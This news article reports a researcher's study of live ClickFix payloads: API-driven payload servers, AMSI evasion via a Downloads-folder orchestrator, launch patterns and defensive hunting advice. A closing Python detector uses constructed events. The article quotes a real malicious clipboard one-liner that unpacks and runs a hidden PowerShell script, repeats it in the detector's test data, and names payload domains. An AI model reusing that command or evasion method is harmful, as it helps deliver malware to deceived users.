Researcher Exposes API-Driven Malware Delivery in ClickFix Campaigns

"ClickFix is here to stay," security researcher Bert‑Jan Pals concluded after dissecting thousands of live payloads — and his data explains why the trick keeps adapting faster than defenders can harden against it.

Bert‑Jan Pals' analysis of roughly 3,000 live payloads

Pals presented his findings at OrangeCon in early June and published the full analysis on June 30. He took apart several ClickFix platforms and examined about 3,000 payloads from active campaigns. His work documents a broad, evolving set of delivery patterns that move the malicious action off the page and into a backend service that issues commands on demand.

API‑driven payload servers: fresh disguises on every request

Pals found that many ClickFix pages no longer embed static clipboard commands. Instead they call backend servers that operate like an on‑demand API: requests are checked for an access token, the caller is logged, and the server returns a freshly scrambled command each time. When Pals requested 100 payloads from one server, he received 100 different wrappers. The wrappers rotated among Base64, AES, TripleDES, Rijndael and Deflate encodings, but — at least in the samples he analyzed — all unpacked to the same script that executes in memory through a PowerShell runspace.

The platforms serve lures in 25 languages and match the command to the visitor's operating system, with macOS payloads appearing alongside Windows versions. Pals also observed a commercialization layer: ESET had already tracked criminal sellers offering ClickFix builders, and Pals found the payload‑generation step itself being run as a service that churns out per‑visitor disguises.

Downloads‑folder method and a quieter bypass of AMSI

Pals documented a newer delivery variant that slips past defenders who watch the clipboard for obvious malicious commands. Rather than pasting the full payload, the page downloads a file to the user's Downloads folder and places a short "orchestrator" one‑liner in the clipboard that moves, unpacks, and runs the downloaded archive. Because the clipboard contains only that orchestrator line — not the payload body — the approach is built to avoid AMSI script scanning. One observed clipboard line looked like this:

powershell -C "$t=$env:TMP;Move-Item \"$HOME\Downloads\tmp.zip\" \"$t\7947.zip\";tar -xf \"$t\7947.zip\" -C \"$t\";conhost --headless powershell -ExecutionPolicy Bypass -File \"$t\tmp.ps1\" # \"* I am not a robot reCAPTCHA Verification ID:7947 *\""

Pals also noted an execution change: the original lures told victims to press Windows+R and paste into the Run box; versions common through 2025 and into 2026 instead direct users to Windows+X and the Windows Terminal. Terminal use looks more ordinary and, unlike the Run box, leaves no trace in the RunMRU registry key investigators commonly check.

Launchers, telemetry and scale: what the data shows

Pals emphasized that reliable defensive signals are behavioral process chains rather than clipboard contents. The common pattern is explorer.exe or WindowsTerminal.exe spawning powershell.exe, cmd.exe, or msiexec.exe and then network activity shortly afterward. In Pals' dataset, PowerShell and cmd were each tied to about 39% of launches, with msiexec close behind at 34%.

The technique has shown striking growth and operational breadth in other firms' telemetry: ESET measured a 517% jump from late 2024 into the first half of 2025, and Microsoft's 2025 Digital Defense Report put ClickFix at 47% of initial‑access cases handled by its Defender Experts team. Proofpoint tied state‑backed groups from Russia, Iran, and North Korea — including APT28, MuddyWater, and Kimsuky — to campaigns that dropped ClickFix into existing infection chains, and North Korean crews built a "ClickFake Interview" variant targeting cryptocurrency workers. Security firm Expel reported one ClearFake wave that likely infected as many as 147,521 systems since late August 2025.

Pals listed three payload servers he observed: comicstar[.]lat, babybon[.]cfd and merkantalolol[.]asia. He cautioned that a connection to one of these hosts does not prove infection; it means a command was most likely placed in someone's clipboard.

What this means for security teams, enterprises, and nation‑state actors

  • Security teams and technologists: Pals highlights behavioral EDR, application‑control rules that limit which programs can call script interpreters, and process‑chain hunting. Specifically, defenders should hunt for one‑liners that touch the Downloads folder and then spawn a hidden PowerShell, and watch for explorer.exe or WindowsTerminal.exe launching powershell.exe, cmd.exe or msiexec.exe followed by network connections.
  • Enterprises and end users: The basic guidance remains effective: "never paste a command you were told to run into the Run box or a terminal." The platforms deliver lures in many languages and produce macOS as well as Windows commands, so simple user‑facing rules and training still matter across diverse user populations.
  • Nation‑state and criminal operators: Proofpoint and Pals both document that state‑backed groups and organized criminals are integrating ClickFix and related variants (FileFix, DownloadFix, ClickFake, ClearFake) into broader chains. Pals warns that the move from disposable wrappers to API‑driven payload servers keeps adaptation cheap to repeat — and that the immediate next risk is the malware itself beginning to vary per victim.
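Detection logic for the two defensive signals the article names, the launcher-to-interpreter-to-network process chain and the Downloads-folder orchestrator one-liner, as an added example that is not part of the original reporting or of Pals' work; the Sysmon-style events, PIDs, timestamps and addresses are constructed for illustration, with the command line modelled on the clipboard line shown earlier.

```python
import re
from datetime import datetime

# Constructed Sysmon-style records (not from the article): id 1 = process creation,
# id 3 = network connection. Only the fields the detector needs are included.
EVENTS = [
    {"id": 1, "t": "2026-06-30T10:00:00", "pid": 4100, "image": "powershell.exe",
     "parent": "WindowsTerminal.exe",
     "cmd": 'powershell -C "$t=$env:TMP;Move-Item $HOME\\Downloads\\tmp.zip $t\\7947.zip;'
            'tar -xf $t\\7947.zip -C $t;conhost --headless powershell -File $t\\tmp.ps1"'},
    {"id": 3, "t": "2026-06-30T10:00:04", "pid": 4100, "image": "powershell.exe",
     "dest": "203.0.113.10:443"},
    {"id": 1, "t": "2026-06-30T10:05:00", "pid": 5200, "image": "powershell.exe",
     "parent": "code.exe", "cmd": "powershell -File build.ps1"},      # benign dev tooling
    {"id": 3, "t": "2026-06-30T10:05:01", "pid": 5200, "image": "powershell.exe",
     "dest": "203.0.113.20:443"},
    {"id": 1, "t": "2026-06-30T10:10:00", "pid": 6300, "image": "cmd.exe",
     "parent": "explorer.exe", "cmd": "cmd /c dir"},                  # no network follow-up
]

LAUNCHER_PARENTS = {"explorer.exe", "windowsterminal.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "msiexec.exe"}
# Orchestrator traits from the article: references the Downloads folder, then runs a
# hidden or headless PowerShell. Heuristic only; tune against your own baseline.
ORCHESTRATOR_RE = re.compile(
    r"\\Downloads\\.*(-w(indowstyle)?\s+hidden|conhost\s+--headless)", re.I)

def find_clickfix_chains(events, window_s=30):
    """Return one finding per interpreter process that (a) was spawned by a user-facing
    launcher and made a network connection within window_s seconds, and/or (b) carries
    a Downloads-orchestrator style command line."""
    net_by_pid = {}
    for e in events:
        if e["id"] == 3:
            net_by_pid.setdefault(e["pid"], []).append(datetime.fromisoformat(e["t"]))
    findings = []
    for e in events:
        if e["id"] != 1 or e["image"].lower() not in INTERPRETERS:
            continue
        reasons = []
        if e["parent"].lower() in LAUNCHER_PARENTS:
            started = datetime.fromisoformat(e["t"])
            if any(0 <= (n - started).total_seconds() <= window_s
                   for n in net_by_pid.get(e["pid"], [])):
                reasons.append("launcher->interpreter->network")
        if ORCHESTRATOR_RE.search(e["cmd"]):
            reasons.append("downloads-orchestrator")
        if reasons:
            findings.append({"pid": e["pid"], "image": e["image"], "reasons": reasons})
    return findings
```

Only the process spawned from WindowsTerminal.exe is flagged, on both signals; the PowerShell launched by an editor and the cmd.exe with no network follow-up are left alone.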

Pals' blunt assessment — "ClickFix is here to stay" — is backed by rapid adoption, backend automation and evolving evasions that shift the defensive emphasis from text in the clipboard to what processes do next. The critical next question, he argues, is whether the core payload will start changing from one victim to the next; if it does, defenders will face a faster, more fragmented problem than the current single‑payload‑under‑many‑wrappers model.

Original reporting: The Hacker News — Researcher Analyzes 3,000 Live ClickFix Payloads, Exposing API-Driven Malware Delivery (June 30, 2026)